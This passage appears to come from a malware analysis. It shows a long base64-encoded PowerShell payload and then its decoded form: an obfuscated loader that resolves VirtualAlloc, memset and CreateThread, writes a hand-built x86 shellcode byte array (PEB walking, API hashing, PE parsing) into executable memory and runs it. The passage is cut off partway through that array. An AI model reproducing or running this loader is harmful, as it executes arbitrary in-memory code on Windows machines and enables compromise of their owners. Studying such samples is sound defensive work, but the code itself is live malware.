B4RkYsMHhGRiwweDUwLDB4NkEsMHgwMCwweDhELDB4ODUsMHg2QywweEZGLDB4RkYsMHhGRiwweDUwLDB4NkEsMHgwMCwweDhCLDB4ODUsMHg3QywweEZGLDB4RkYsMHhGRiwweDgzLDB4QzAsMHg0MSwweDUwLDB4OEIsMHg4NSwweDcwLDB4RkYsMHhGRiwweEZGLDB4NTAsMHhGRiwweDU1LDB4QUMsMHg4NSwweEMwLDB4NzUsMHg1QywweDgzLDB4QkQsMHg2MCwweEZGLDB4RkYsPCN4ZGUjPjB4RkYsMHg2NCwweDc2LDB4NTMsMHg2QSwweDQwLDB4NjgsMHgwMCwweDMwLDB4MDAsMHgwMCwweDhCLDB4ODUsMHg2MCwweEZGLDB4RkYsMHhGRiwweDUwLDB4NkEsMHgwMCwweEZGLDB4NTUsMHhBOCwweDg5LDB4ODUsMHg2NCwweEZGLDB4RkYsMHhGRiwweDgzLDB4QkQsMHg2NCwweEZGLDB4RkYsPCNjaHEjPjB4RkYsMHgwMCwweDc0LDB4MzEsMHg4RCwweDg1LDB4NjAsMHhGRiwweEZGLDB4RkYsMHg1MCwweDhCLDB4ODUsPCNidSM+MHg2NCwweEZGLDB4RkYsMHhGRiwweDUwLDB4OEQsMHg4NSwweDZDLDwja2YjPjB4RkYsPCN5YWMjPjB4RkYsMHhGRiwweDUwLDB4NkEsMHgwMCwweDhCLDB4ODUsMHg3QywweEZGLDB4RkYsPCN5bCM+MHhGRiwweDgzLDB4QzAsMHg0MSwweDUwLDB4OEIsMHg4NSwweDcwLDwjbXgjPjB4RkYsMHhGRiwweEZGLDB4NTAsMHhGRiwweDU1LDB4QUMsMHg4NSwweEMwLDB4NzUsMHgwMiwweEIzLDB4MDEsMHgzMywweEMwLDB4ODksMHg4NSw8I2huIz4weDcwLDB4RkYsMHhGRiwweEZGLDB4ODQsMHhEQiwweDBGLDwjZHMjPjB4ODUsMHhCOCwweDAwLDB4MDAsMHgwMCwweDMzLDB4QzAsMHg4OSwweDg1LDwjdXUjPjB4NjQsMHhGRiwweEZGLDB4RkYsPCN4byM+MHgzMywweEMwLDB4ODksMHg4NSw8I21uZiM+MHg2MCwweEZGLDB4RkYsMHhGRiwweDhELDB4ODUsMHg3MCwweEZGLDB4RkYsMHhGRiw8I2dkZyM+MHg1MCwweDZBLDB4MDEsMHg2QSwweDAwLDB4OEIsMHg4NSwweDdDLDB4RkYsMHhGRiwweEZGLDB4NTAsMHg2OCwweDAxLDB4MDAsMHgwMCwweDgwLDB4RkYsMHg1NSwweEIwLDB4ODUsMHhDMCwweDBGLDB4ODUsMHg4NiwweDAwLDB4MDAsMHgwMCw8I2d3cSM+MHg4RCwweDg1LDB4NjAsMHhGRiwweEZGLDB4RkYsMHg1MCwweDZBLDB4MDAsMHg4RCwweDg1LDB4NkMsMHhGRiwweEZGLDB4RkYsMHg1MCwweDZBLDB4MDAsMHg4QiwweDg1LDB4N0MsMHhGRiwweEZGLDB4RkYsMHg4MywweEMwLDB4NDEsMHg1MCwweDhCLDB4ODUsMHg3MCwweEZGLDB4RkYsMHhGRiwweDUwLDB4RkYsPCNucmwjPjB4NTUsMHhBQywweDg1LDwjYXMjPjB4QzAsMHg3NSwweDVDLDB4ODMsMHhCRCwweDYwLDB4RkYsMHhGRiwweEZGLDB4NjQsMHg3NiwweDUzLDB4NkEsMHg0MCwweDY4LDB4MDAsMHgzMCwweDAwLDB4MDAsMHg4QiwweDg1LDB4NjAsPCNxciM+MHhGRiwweEZGLDB4RkYsMHg1MCwweDZBLDB4MDAsMHhGRiwweDU1LDB4QTgsMHg4OSwweDg1LDwjZnpxIz4weDY0LDB4RkYsMHhGRiwweEZGLDB4ODMsMHhCRCwweDY0LDB4RkYsMHhGRiwweEZGLDB4MDAsMHg3NCwweDMxLDB4OEQsMHg4NSwweDYwLDB4RkYsMHhGRiwweEZGLDwjbnB1Iz4weDUwLDB4OEIsMHg4NSwweDY0LDB4RkYsMHhGRiwweEZGLDB4NTAsMHg4RCwweDg1LDB4NkMsMHhGRiwweEZGLDB4RkYsMHg1MCwweDZBLDB4MDAsMHg4QiwweDg1LDB4N0MsMHhGRiwweEZGLDB4RkYsMHg4MywweEMwLDB4NDEsMHg1MCwweDhCLDwjZXBwIz4weDg1LDwjcmMjPjB4NzAsMHhGRiwweEZGLDB4RkYsPCNwb2kjPjB4NTAsPCN0ZyM+MHhGRiwweDU1LDB4QUMsPCNzdHQjPjB4ODUsMHhDMCw8I2t3Iz4weDc1LDB4MDIsMHhCMywweDAxLDB4ODQsMHhEQiw8I3NheCM+MHg3NSwweDA1LDwjb21wIz4weDZBLDB4MDAsMHhGRiwweDU1LDB4QTQsMHg4QiwweDg1LDB4N0MsMHhGRiwweEZGLDB4RkYsMHg4QiwweDgwLDwjdHhkIz4weERDLDB4MDAsMHgwMCwweDAwLDB4NTAsMHg4QiwweDg1LDwjYXJnIz4weDdDLDB4RkYsMHhGRiwweEZGLDB4ODMsMHhDMCwweDUyLDB4NTAsMHg4RCwweDg1LDB4MDAsMHhGQSwweEZGLDB4RkYsMHg1MCw8I2NwcCM+MHhGRiwweDk1LDB4NzgsMHhGRiwweEZGLDB4RkYsMHgzMywweEY2LDB4OEQsMHg4RCwweDAwLDB4RkIsMHhGRiwweEZGLDB4ODksMHgzMSwweDQ2LDB4ODMsMHhDMSwweDA0LDB4ODEsMHhGRSwweDAwLDB4MDEsMHgwMCwweDAwLDB4NzUsMHhGMiwweDMzLDB4REIsMHgzMywweEY2LDB4OEQsMHg4RCwweDAwLDB4RkIsMHhGRiwweEZGLDwjYXhqIz4weDAzLDB4MTksPCN2cW0jPjB4OEIsMHg4NSwweDdDLDB4RkYsMHhGRiwweEZGLDB4RkYsMHhCMCwweERDLDB4MDAsMHgwMCwweDAwLDB4OEIsMHhDNiw8I3dydiM+MHg1QSwweDhCLDB4RkEsMHgzMywweEQyLDB4RjcsMHhGNywweDMzLDB4QzAsMHg4QSwweDg0LDB4MTUsMHgwMCwweEZBLDB4RkYsMHhGRiwweDAzLDB4RDgsMHg4MSwweEUzLDB4RkYsMHgwMCwweDAwLDB4MDAsMHg4QSwweDAxLDwjb25uIz4weDhCLDB4OTQsMHg5RCwweDAwLDB4RkIsMHhGRiwweEZGLDB4ODksMHgxMSwweDI1LDB4RkYsMHgwMCwweDAwLDB4MDAsMHg4OSwweDg0LDB4OUQsMHgwMCwweEZCLDB4RkYsMHhGRiwweDQ2LDB4ODMsMHhDMSw8I3pxIz4weDA0LDB4ODEsMHhGRSwweDAwLDB4MDEsMHgwMCwweDAwLDB4NzUsMHhCNSw8I3pqYiM+MHgzMywweERCLDB4MzMsMHhGRiw8I3hncCM+MHg2QSwweDQwLDB4NjgsMHgwMCwweDMwLDB4MDAsMHgwMCwweDhCLDwjZG4jPjB4ODUsPCNvbyM+MHg2MCwweEZGLDB4RkYsMHhGRiwweDUwLDB4NkEsPCNienEjPjB4MDAsMHhGRiw8I2F0byM+MHg1NSw8I3R1Iz4weEE4LDB4ODksMHg4NSwweDVDLDB4RkYsMHhGRiwweEZGLDB4ODMsMHhCRCwweDVDLDB4RkYsPCNrayM+MHhGRiwweEZGLDB4MDAsMHg3NCwweDI5LDB4OEIsMHg4NSw8I3lucCM+MHg1QywweEZGLDB4RkYsMHhGRiwweDg5LDB4ODUsPCN0dHAjPjB4NEMsMHhGRiwweEZGLDB4RkYsMHg4QiwweDg1LDB4NjAsMHhGRiwweEZGLDB4RkYsMHg1MCwweDhCLDB4ODUsMHg2NCwweEZGLDB4RkYsMHhGRiwweDUwLDB4OEIsMHg4NSw8I2JiayM+MHg0QywweEZGLDB4RkYsMHhGRiwweDUwLDB4RkYsMHg5NSwweDc4LDB4RkYsMHhGRiwweEZGLDB4RUIsMHgwNSwweDZBLDB4MDAsMHhGRiwweDU1LDB4QTQsMHg4QiwweDg1LDB4NjAsMHhGRiw8I2RkdiM+MHhGRiwweEZGLDB4NDgsMHg4NSwweEMwLDB4NzIsMHg3NCwweDQwLDB4ODksMHg4NSwweDNDLDB4RkYsMHhGRiwweEZGLDB4MzMsMHhGNiwweDQzLDB4ODEsMHhFMywweEZGLDB4MDAsMHgwMCwweDAwLDB4MDMsMHhCQywweDlELDB4MDAsMHhGQiwweEZGLDB4RkYsMHg4MSwweEU3LDB4RkYsMHgwMCwweDAwLDB4MDAsMHg4QSwweDg0LDB4OUQsMHgwMCwweEZCLDB4RkYsMHhGRiwweDhCLDB4OTQsMHhCRCwweDAwLDB4RkIsMHhGRiw8I3VwbiM+MHhGRiwweDg5LDB4OTQsMHg5RCwweDAwLDB4RkIsMHhGRiwweEZGLDB4MjUsPCN4cmYjPjB4RkYsMHgwMCwweDAwLDB4MDAsMHg4OSwweDg0LDB4QkQsMHgwMCwweEZCLDB4RkYsMHhGRiwweDhCLDB4ODUsMHg0QywweEZGLDB4RkYsMHhGRiwweDhBLDB4MDQsMHgzMCwweDhCLDB4OTQsMHg5RCwweDAwLDwjY3JmIz4weEZCLDB4RkYsMHhGRiwweDAzLDB4OTQsMHhCRCwweDAwLDB4RkIsMHhGRiwweEZGLDB4ODEsMHhFMiwweEZGLDB4MDAsMHgwMCwweDAwLDwjb2EjPjB4MzIsMHg4NCwweDk1LDB4MDAsMHhGQiwweEZGLDB4RkYsMHg4QiwweDk1LDB4NEMsMHhGRiwweEZGLDB4RkYsMHg4OCwweDA0LDB4MzIsMHg0Niw8I3N1dSM+MHhGRiwweDhELDB4M0MsMHhGRiwweEZGLDB4RkYsMHg3NSwweDk1LDB4OEIsMHg4NSw8I3R4Iz4weDRDLDB4RkYsMHhGRiwweEZGLDB4ODksMHg0NSwweEQ0LDB4OEIsMHg0NSwweEQ0LDB4NjYsMHg4MSwweDM4LDB4NEQsMHg1QSwweDBGLDB4ODUsMHhEQSwweDAyLDB4MDAsMHgwMCwweDhCLDB4NDUsPCN5biM+MHhENCwweDhCLDB4NDAsMHgzQywweDAzLDB4ODUsMHg0QywweEZGLDB4RkYsMHhGRiwweDg5LDB4NDUsMHhEMCwweDhCLDB4NDUsMHhEMCwweDgxLDB4MzgsMHg1MCwweDQ1LDB4MDAsMHgwMCwweDBGLDB4ODUsMHhCQyw8I3Z5Iz4weDAyLDB4MDAsMHgwMCwweDhCLDB4NDUsMHhEMCwweDhCLDB4NTgsMHg1MCwweDAzLDB4REIsMHg2QSwweDQwLDwjbHYjPjB4NjgsMHgwMCwweDMwLDB4MDAsMHgwMCw8I2RsZiM+MHg1Myw8I2ZydSM+MHg2QSw8I2FyIz4weDAwLDB4RkYsMHg1NSwweEE4LDB4ODksMHg0NSwweEY4LDB4ODMsMHg3RCwweEY4LDB4MDAsMHgwRiwweDg0LDB4OUEsMHgwMiwweDAwLDB4MDAsMHg4QiwweDQ1LDB4RDAsMHg4QiwweDQwLDB4NTQsMHg1MCwweDhCLDwjc3AjPjB4ODUsPCNsdGIjPjB4NEMsMHhGRiwweEZGLDB4RkYsMHg1MCwweDhCLDB4NDUsMHhGOCw8I2xmbCM+MHg1MCwweEZGLDB4OTUsMHg3OCwweEZGLDB4RkYsMHhGRiwweDZBLDB4MDQsMHg4QiwweDg1LDB4N0MsMHhGRiwweEZGLDB4RkYsMHgwNSwweEUwLDB4MDAsMHgwMCwweDAwLDB4NTAsMHg4QiwweDQ1LDB4RDAsMHg4QiwweDQwLDB4NTAsMHgwMywweDQ1LDB4RjgsMHg1MCwweEZGLDB4OTUsMHg3OCwweEZGLDB4RkYsMHhGRiwweDhCLDB4ODUsMHg3QywweEZGLDB4RkYsMHhGRiwweDhCLDB4ODAsMHhFMCwweDAwLDB4MDAsMHgwMCwweDUwLDB4OEIsMHg4NSwweDRDLDB4RkYsMHhGRiw8I3JwbyM+MHhGRiwweDUwLDB4OEIsMHg0NSwweEQwLDB4OEIsMHg0MCwweDUwLDB4MDMsMHg0NSwweEY4LDB4ODMsMHhDMCwweDA0LDB4NTAsMHhGRiwweDk1LDB4NzgsMHhGRiwweEZGLDB4RkYsMHg2QSwweDYwLDB4OEIsMHg4NSwweDdDLDB4RkYsMHhGRiwweEZGLDB4ODMsMHhDMCwweDdBLDB4NTAsMHg4QiwweDQ1LDB4RDAsMHg4Qiw8I2ltbSM+MHg0MCwweDUwLDB4MDMsMHg0NSwweEY4LDB4ODMsMHhDMCwweDA0LDB4OEIsPCN3Zm0jPjB4OTUsMHg3QywweEZGLDB4RkYsMHhGRiwweDAzLDB4ODIsMHhFMCwweDAwLDB4MDAsMHgwMCwweDUwLDwjcGojPjB4RkYsMHg5NSwweDc4LDB4RkYsMHhGRiwweEZGLDB4OEIsMHg0NSwweEQwLDB4MEYsMHhCNywweDQwLDB4MDYsMHg0OCwweDg1LDB4QzAsMHg3QywweDVGLDB4NDAsMHg4OSw8I25vdCM+MHg4NSwweDNDLDB4RkYsMHhGRiwweEZGLDB4MzMsMHhGNiw8I3F2Iz4weDhCLDB4NTUsMHhENCwweDhCLDB4NTIsMHgzQywweDhCLDB4ODUsMHg0QywweEZGLDB4RkYsMHhGRiwweDAzLDB4RDAsMHg4MSwweEMyLDB4RjgsPCN5eGcjPjB4MDAsMHgwMCwweDAwLDB4OEIsMHhDRSwweEMxLDB4RTEsMHgwMywweDhELDwjeGUjPjB4MEMsMHg4OSwweDAzLDwjdnptIz4weEQxLDB4ODksMHg5NSwweDUwLDB4RkYsMHhGRiw8I2hraSM+MHhGRiwweDhCLDB4OTUsMHg1MCwweEZGLDB4RkYsMHhGRiwweDhCLDB4NTIsMHgxMCwweDUyLDB4OEIsMHg5NSwweDUwLDB4RkYsMHhGRiwweEZGLDB4OEIsMHg1MiwweDE0LDB4MDMsMHhEMCwweDUyLDB4OEIsMHg4NSwweDUwLDB4RkYsMHhGRiwweEZGLDB4OEIsPCNnayM+MHg0MCwweDBDLDB4MDMsMHg0NSwweEY4LDB4NTAsMHhGRiwweDk1LDB4NzgsMHhGRiw8I3pjaSM+MHhGRiwweEZGLDB4NDYsMHhGRiwweDhELDB4M0MsMHhGRiwweEZGLDB4RkYsMHg3NSwweEFBLDB4OEIsMHg0NSwweEQwLDB4OEIsMHg0MCw8I3JpIz4weDM0LDwjc3NmIz4weDNCLDB4NDUsMHhGOCwweDBGLDB4ODQsPCN2bSM+MHhDQiwweDAwLDwjbnMjPjB4MDAsMHgwMCwweDhCLDwjcXZtIz4weDQ1LDB4RDAsMHg4QiwweDU1LDB4RjgsMHgyQiwweDUwLDB4MzQsMHg4OSwweDU1LDB4RDgsMHg4QiwweDQ1LDB4RjgsMHg4OSwweDQ1LDB4RjAsMHg4QiwweDQ1LDB4RDAsMHg4MywweEI4LDB4QTQsPCNvZiM+MHgwMCwweDAwLDwjeWsjPjB4MDAsMHgwMCwweDBGLDB4ODYsMHg4NywweDAwLDB4MDAsPCN2YSM+MHgwMCwweDhCLDB4NDUsMHhEMCwweDhCLDB4ODAsMHhBMCw8I214Iz4weDAwLDB4MDAsMHgwMCwweDAzLDB4NDUsMHhGMCwweDg5LDwjbGt1Iz4weDQ1LDB4RUMsMHhFQiwweDZFLDB4OEIsMHg0NSwweEVDLDB4OEIsMHgwMCwweDAzLDB4NDUsMHhGMCwweDg5LDB4NDUsMHhFOCwweDhCLDB4NDUsMHhFQywweDgzLDB4QzAsMHgwOCwweDg5LDB4NDUsPCNpdHAjPjB4RTQsPCN2ZiM+MHg4QiwweDQ1LDB4RUMsMHg4QiwweDQwLDB4MDQsMHg4MywweEU4LDB4MDgsMHhEMSwweEU4LDB4NDgsMHg4NSwweEMwLDB4NzIsMHgzRSwweDQwLDB4ODksMHg4NSwweDNDLDB4RkYsMHhGRiwweEZGLDB4OEIsMHg0NSwweEU0LDB4NjYsMHg4QiwweDEwLDB4MEYsMHhCNywweEMyLDB4QzEsMHhFOCwweDBDLDB4OEIsMHhDQSwweDY2LDwjcXYjPjB4ODEsMHhFMSwweEZGLDB4MEYsMHgwRiwweEI3LDB4QzksMHg4MywweEY4LDB4MDMsMHg3NSwweDEwLDB4OEIsMHg0NSwweEU4LDB4MDMsMHhDMSwweDg5LDB4NDUsMHhFMCwweDhCLDB4NDUsMHhFMCwweDhCLDB4NTUsMHhEOCwweDAxLDB4MTAsMHg4MywweDQ1LDB4RTQsMHgwMiwweEZGLDB4OEQsMHgzQywweEZGLDB4RkYsPCNzdyM+MHhGRiw8I3ZqIz4weDc1LDB4QzksMHg4QiwweDQ1LDB4RUMsMHg4QiwweDQwLDB4MDQsMHgwMywweDQ1LDwjaXQjPjB4RUMsMHg4OSw8I2lreCM+MHg0NSw8I2lyeCM+MHhFQywweDhCLDB4NDUsMHhFQywweDgzLDB4MzgsMHgwMCwweDc3LDB4OEEsMHg4QiwweDQ1LDB4RDAsMHg4QiwweDU1LDB4RjgsMHg4OSwweDUwLDB4MzQsMHg2OCwweEY4LDB4MDAsMHgwMCwweDAwLDB4OEIsPCN5aWEjPjB4NDUsPCNuZ2cjPjB4RDAsMHg1MCwweDhCLDB4NDUsMHhENCwweDhCLDB4NDAsMHgzQywweDAzLDB4NDUsMHhGOCwweDUwLDB4RkYsPCNsdyM+MHg5NSwweDc4LDB4RkYsMHhGRiwweEZGLDB4OEIsMHg0NSwweEQwLDB4MDUsMHg4MCwweDAwLDB4MDAsMHgwMCwweDg5LDB4NDUsPCNlZXUjPjB4OTAsMHg4QiwweDQ1LDB4OTAsMHg4MywweDc4LDB4MDQsMHgwMCwweDBGLDwjZWJ0Iz4weDg2LDB4OUUsMHgwMCw8I2NmIz4weDAwLDwjaXV1Iz4weDAwLDB4OEIsMHg0NSw8I2l1Iz4weEQwLDB4OEIsMHg4MCwweDgwLDwjc2cjPjB4MDAsMHgwMCw8I3RhdiM+MHgwMCwweDAzLDB4NDUsMHhGOCwweDg5LDB4NDUsMHg4QywweEVCLDB4N0YsMHgwMyw8I2thZSM+MHg3RCwweEY4LDB4NTcsMHhGRiwweDU1LDB4QkMsMHg4QiwweEQ4LDB4ODUsMHhEQiwweDc0LDB4NzIsMHg4QiwweDQ1LDB4OEMsMHg4MywweDM4LDB4MDAsMHg3NCwweDBELDB4OEIsMHg0NSwweDhDLDB4OEIsMHgwMCw8I2RhIz4weDAzLDB4NDUsMHhGOCwweDg5LDB4NDUsMHg4OCwweEVCLDB4MEMsMHg4QiwweDQ1LDB4OEMsMHg4QiwweDQwLDB4MTAsMHgwMywweDQ1LDB4RjgsMHg4OSwweDQ1LDB4ODgsMHg4QiwweDQ1LDB4OEMsMHg4Qiw8I2xvIz4weDQwLDB4MTAsMHgwMywweDQ1LDB4RjgsMHg4OSwweDQ1LDB4ODQsMHhFQiwweDM3LDB4OEIsMHg0NSwweDg4LDwjdXQjPjB4OEIsMHgzMCw8I2V5dCM+MHhGNywweEM2LDB4MDAsMHgwMCwweDAwLDB4ODAsMHg3NCwweDEyLDB4ODEsMHhFNiw8I3J1byM+MHhGRiwweEZGLDB4MDAsMHgwMCwweDU2LDB4NTMsMHhGRiwweDU1LDB4QjgsMHg4QiwweDU1LDB4ODQsMHg4OSwweDAyLDwjc2cjPjB4RUIsMHgxMCwweDAzLDB4NzUsMHhGOCwweDgzLDB4QzYsMHgwMiwweDU2LDB4NTMsMHhGRiwweDU1LDB4QjgsMHg4QiwweDU1LDB4ODQsMHg4OSwweDAyLDwjbmkjPjB4ODMsMHg0NSwweDg4LDwjZWIjPjB4MDQsMHg4Myw8I2ZwYSM+MHg0NSw8I3phIz4weDg0LDB4MDQsMHg4QiwweDQ1LDB4ODgsMHg4Myw8I2V6cSM+MHgzOCwweDAwLDB4NzUsMHhDMSwweDgzLDB4NDUsMHg4QywweDE0LDB4OEIsMHg0NSwweDhDLDB4OEIsMHg3OCwweDBDLDB4ODUsMHhGRiwweDBGLDB4ODUsMHg3MywweEZGLDB4RkYsMHhGRiwweDhCLDB4NDUsMHhEMCw8I2Z5dyM+MHg4QiwweDQwLDB4MjgsMHgwMywweDQ1LDB4RjgsMHg4OSwweDQ1LDB4RjQsMHgzMSwweEMwLDB4NTAsMHg2QSwweDAxLDB4RkYsMHg3NSwweEY4LDB4RkYsMHg1NSwweEY0LDwjdmFnIz4weDZBLDB4MDAsPCNob3ojPjB4RkYsMHg1NSwweEE0LDwjbXJpIz4weDVGLDB4NUUsPCNxYiM+MHg1QiwweDhCLDB4RTUsMHg1RCwweEMyLDB4MDQsPCNzaCM+MHgwMCwweDhELDB4NDAsPCNtcHgjPjB4MDAsMHg3MywweDZGLDB4NjYsMHg3NCwweDc3LDB4NjEsMHg3MiwweDY1LDB4NUMsPCN5dGwjPjB4MzcsPCN6a2YjPjB4NDcsMHg1NywweDczLDB4NjEsMHg0MSwweDY1LDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDwjZ2NhIz4weDAwLDB4MDAsMHgwMCw8I3J6Iz4weDAwLDB4MDAsMHgwMCw8I25vIz4weDAwLDB4MDAsMHgwMCw8I2RmZCM+MHgwMCwweDAwLDB4MDAsMHgwMCwweDQ3LDB4NzMsMHg0NCwweDc5LDB4NzEsMHg3NCwweDU1LDB4MzYsMHg3MSwweDZFLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHg3Miw8I3FmciM+MHg4MiwweDk3LDB4NDYsMHhFNCwweDFCLDB4RjIsMHhBQiwweEQ5LDB4MDAsMHgwQSwweDk3LDB4ODIsMHgyNSwweDVGLDB4RTQsMHg5OSwweDVELDB4QjYsMHg4RSwweDczLDB4MjMsMHg0NiwweDdBLDB4OTIsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHg3MywweDAwLDB4NjgsMHgwMCwweDY1LDwjanUjPjB4MDAsMHg2QywweDAwLDB4NkMsMHgwMCwweDNDLDB4MDAsMHgzQyw8I2F3cyM+MHgwMCwweDNBLDB4MDAsMHgzQSwweDAwLDwjYmZ3Iz4weDNFLDB4MDAsMHgzRSwweDAwLDwjanAjPjB4NzMsMHgwMCwweDY4LDB4MDAsMHg2NSwweDAwLDB4NkMsMHgwMCwweDZDLDB4MDAsMHg2MiwweDAwLDwjYWQjPjB4NzAsMHgwMCwweDczLDB4MDAsMHgzQSwweDAwLDB4M0EsMHgwMCwweDYyLDB4MDAsMHg3MCwweDAwLDB4NzMsMHgwMCwweDZFLDB4MDAsMHg3NSwweDAwLDB4NkQsMHgwMCwweDNBLDB4MDAsMHgzOCwweDAwLDB4MzYsMHgwMCwweDM0LDB4MDAsPCN2eSM+MHgzQSwweDAwLDB4NkUsMHgwMCwweDc1LDwjemtnIz4weDAwLDB4NkQsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDwjd2NtIz4weDAwLDB4MDAsPCNreCM+MHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDAwLDB4MDAsMHgwMCwweDE5LDB4MDAsMHgwMCwweDAwLDB4MDAsMHhBQSwweDA2LDB4MDAsPCNhZSM+MHg1NSwweDhCLDB4RUMsMHg2MCwweDhCLDB4N0QsMHgwOCwweDhCLDB4NzUsMHgwQywweDhCLDB4NEQsMHgxMCwweEYzLDB4QTQsMHg2MSwweDVELDB4QzIsMHgwQywweDAwLDwjYmgjPjB4RDYsMHgyNywweEQxLDB4NTgsMHgwMCwweEEwLDB4NjYsMHgzNywweDEzLDB4OTksMHg0NCwweDgyLDB4MzYsMHgwMiwweENGLDB4ODIsMHg1OCwweENBLDB4MEIsMHg3OCwweDY0LDB4QjIsMHhGNywweDk5LDB4MkQsMHg2NCwweEE3LDwjbmZ2Iz4weEFCLDB4NUYsMHgwRCwweDlCLDB4RkIsMHg0NSwweEMyLDB4MkIsMHhBQywweDMzLDwjZHhnIz4weDU1LDB4MTMsMHg4RSwweENDLDB4NjYsMHg2MywweDEyLDB4OTcsMHhFRCwweDZBLDB4RkUsMHg3RSwweDcxLDwjYXkjPjB4NUIsMHhFRCw8I2Z2Iz4weDJGLDB4QTQsMHhDNSw8I29uZyM+MHhDNywweDhFLDB4MzgsMHgyNSwweEM5LDB4OTcsMHgwNCw8I3R5Iz4weDE2LDB4QjQsMHg2NywweERELDB4RkEsMHg0MiwweDRGLDB4QkUsPCN3cCM+MHgyMCwweDAxLDB4MkQ7DQojZWJmdnhrZmZ2bA0KJHByPShbU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzLk1hcnNoYWxdOjpHZXREZWxlZ2F0ZUZvckZ1bmN0aW9uUG9pbnRlcigoZ3Byb2Mga2VybmVsMzIuZGxsIFZpcnR1YWxBbGxvYyksKGdkZWxlZ2F0ZSBAKFtJbnRQdHJdLFtVSW50MzJdLFtVSW50MzJdLFtVSW50MzJdKSAoW1VJbnQzMl0pKSkpLkludm9rZSgwLCRzYzMyLkxlbmd0aCwweDMwMDAsMHg0MCk7DQojemZnZA0KaWYoJHByIC1uZSAwKXskbWVtc2V0PShbU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzLk1hcnNoYWxdOjpHZXREZWxlZ2F0ZUZvckZ1bmN0aW9uUG9pbnRlcigoZ3Byb2MgbXN2Y3J0LmRsbCBtZW1zZXQpLChnZGVsZWdhdGUgQChbVUludDMyXSxbVUludDMyXSxbVUludDMyXSkgKFtJbnRQdHJdKSkpKTsNCiNwaGp5bnp6b3F4DQpmb3IgKCRpPTA7JGkgLWxlICgkc2MzMi5MZW5ndGgtMSk7JGkrKykgeyRtZW1zZXQuSW52b2tlKCgkcHIrJGkpLCAkc2MzMlskaV0sIDEpfTsNCiNsdnl0amoNCihbU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzLk1hcnNoYWxdOjpHZXREZWxlZ2F0ZUZvckZ1bmN0aW9uUG9pbnRlcigoZ3Byb2Mga2VybmVsMzIuZGxsIENyZWF0ZVRocmVhZCksKGdkZWxlZ2F0ZSBAKFtJbnRQdHJdLFtVSW50MzJdLFtVSW50MzJdLFtVSW50MzJdLFtVSW50MzJdLFtJbnRQdHJdKSAoW0ludFB0cl0pKSkpLkludm9rZSgwLDAsJHByLCRwciwwLDApOw0KI3BqcXR0dHpwDQp9c2xlZXAoMTIwMCk7fWNhdGNoe31leGl0Ow0KI3VzcnVjdw0KI290bGJsb2FiDQo=')))
which when you decode the base64, you get the following (which looks to be an array perhaps):
#avobmsjvucjuocxunkajuvogibdcmkeqp
sleep(15);try{
#wqdyo
function gdelegate{
#fdfffepqoo
Param ([Parameter(Position=0,Mandatory=$True)] [Type[]] $Parameters,[Parameter(Position=1)] [Type] $ReturnType=[Void]);
#gktfrbj
$TypeBuilder=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName("ReflectedDelegate")),[System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule("InMemoryModule",$false).DefineType("XXX","Class,Public,Sealed,AnsiClass,AutoClass",[System.MulticastDelegate]);
#nwbkci
$TypeBuilder.DefineConstructor("RTSpecialName,HideBySig,Public",[System.Reflection.CallingConventions]::Standard,$Parameters).SetImplementationFlags("Runtime,Managed");
#thlr
$TypeBuilder.DefineMethod("Invoke","Public,HideBySig,NewSlot,Virtual",$ReturnType,$Parameters).SetImplementationFlags("Runtime,Managed");
#cxywzfl
return $TypeBuilder.CreateType();}
#alkfpyijql
function gproc{
#mkleldsfcl
Param ([Parameter(Position=0,Mandatory=$True)] [String] $Module,[Parameter(Position=1,Mandatory=$True)] [String] $Procedure);
#bpnie
$SystemAssembly=[AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split("\")[-1].Equals("System.dll")};
#vdznigk
$UnsafeNativeMethods=$SystemAssembly.GetType("Microsoft.Win32.UnsafeNativeMethods");
#jutvbiw
return $UnsafeNativeMethods.GetMethod("GetProcAddress").Invoke($null,@([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr),$UnsafeNativeMethods.GetMethod("GetModuleHandle").Invoke($null,@($Module)))),$Procedure));}
#icebofnc
[Byte[]] $sc32 = 0x55,<#rpr#>0x8B,0xEC,<#ji#>0x81,0xC4,0x00,0xFA,0xFF,0xFF,0x53,0x56,0x57,0x53,0x56,0x57,0xFC,0x31,0xD2,0x64,0x8B,<#atw#>0x52,0x30,0x8B,0x52,<#bep#>0x0C,0x8B,0x52,0x14,0x8B,0x72,0x28,0x6A,0x18,0x59,0x31,0xFF,0x31,0xC0,<#ccd#>0xAC,0x3C,0x61,0x7C,0x02,0x2C,0x20,0xC1,0xCF,0x0D,0x01,0xC7,0xE2,0xF0,0x81,0xFF,0x5B,0xBC,0x4A,0x6A,0x8B,0x5A,0x10,0x8B,0x12,0x75,0xDB,0x89,<#ro#>0x5D,0xFC,<#sc#>0x5F,0x5E,0x5B,0x8B,0x45,0xFC,0x89,0x45,0xD4,0x8B,0x45,0xD4,0x66,0x81,0x38,0x4D,0x5A,0x0F,0x85,0x0F,<#cw#>0x02,0x00,0x00,0x8B,0x45,0xFC,0x33,0xD2,0x52,0x50,0x8B,<#lpj#>0x45,0xD4,0x8B,0x40,0x3C,0x99,0x03,0x04,0x24,0x13,0x54,0x24,0x04,0